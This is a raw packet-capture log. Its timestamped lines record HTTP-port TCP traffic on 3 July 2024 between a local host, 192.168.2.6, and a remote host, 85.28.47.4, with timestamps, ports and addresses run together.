                                                                Jul 3, 2024 08:38:19.187247038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187258005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187266111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187268019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187278032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187284946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187289000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187299013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187309980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187310934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187320948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187330008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187330008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187340975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187350988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187356949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187361002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187371016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187381029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187382936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187391043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187395096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187401056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187411070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.187417984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.187457085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188172102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188184023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188194036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188199997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188210011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188215971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188220978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188225985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188237906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188246965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188257933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188266993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188272953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188277960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188287020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188290119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188299894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188308001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188311100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188321114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188329935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188365936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188863993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188875914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188886881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188898087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188909054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188909054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188920021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188930988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.188939095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.188967943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.270561934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270608902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270626068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270637035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270647049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270657063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270668030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270678997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270694017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.270726919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.270759106 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.270853043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270879030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270884991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270889997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270900965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270906925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270919085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.270935059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.270966053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271121979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271157026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271204948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271215916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271240950 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271255970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271436930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271446943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271457911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271469116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271477938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271478891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271488905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271498919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271526098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271553993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271580935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271599054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271610022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271620989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271620989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271631956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271640062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271641970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271651030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271652937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271663904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271672964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271680117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271683931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.271698952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.271723986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272162914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272173882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272183895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272193909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272202969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272205114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272214890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272224903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272224903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272236109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272245884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272253990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272257090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272269964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272314072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272571087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272582054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272591114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272595882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272608042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272634983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272671938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272682905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272691965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272703886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272706985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272717953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272720098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272727966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272737026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.272737980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.272767067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273109913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273121119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273130894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273142099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273154020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273159027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273168087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273185015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273256063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273267031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273277044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273287058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273288965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273297071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273307085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273318052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273322105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273328066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273338079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273348093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273353100 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273358107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273369074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.273369074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273387909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.273402929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274102926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274116039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274127960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274141073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274147034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274153948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274163961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274164915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274175882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274185896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274195910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274195910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274205923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274213076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274215937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274226904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274231911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274245024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274249077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274255991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274265051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274275064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274276972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274285078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.274311066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.274324894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275007010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275018930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275028944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275039911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275049925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275059938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275063992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275069952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275080919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275089979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275099039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275100946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275111914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275120020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275121927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275131941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275141954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275149107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275152922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275162935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275166988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275172949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275182962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275183916 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275213003 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275759935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275770903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275780916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275793076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275799990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275804996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275815010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275820017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275826931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.275849104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.275875092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.357820034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.357853889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.357866049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.357886076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.357897043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358004093 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358028889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358038902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358048916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358059883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358063936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358069897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358092070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358115911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358270884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358279943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358289957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358309984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358382940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358383894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358393908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358402967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358412981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358417988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358428001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358448982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358486891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358623028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358633041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358643055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358653069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358658075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358663082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358674049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358683109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358721018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358884096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358894110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358905077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358922005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358932018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358942032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358952045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358961105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.358971119 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.358972073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359009981 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359364033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359373093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359383106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359392881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359402895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359409094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359412909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359422922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359432936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359441996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359442949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359453917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359464884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359469891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359502077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359894037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359904051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359914064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359924078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359934092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359941959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359945059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359955072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359963894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359973907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.359976053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.359985113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360011101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.360033035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.360378981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360388994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360399008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360408068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360414028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.360418081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360428095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360438108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360446930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.360447884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360459089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.360491037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.469039917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.473907948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646547079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646574020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646585941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646595955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646606922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646626949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646676064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646687984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646696091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.646697998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646708965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646740913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.646759987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.646883011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646893978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646903992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646914005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646928072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.646929026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.646941900 CEST804971085.28.47.4192.168.2.6
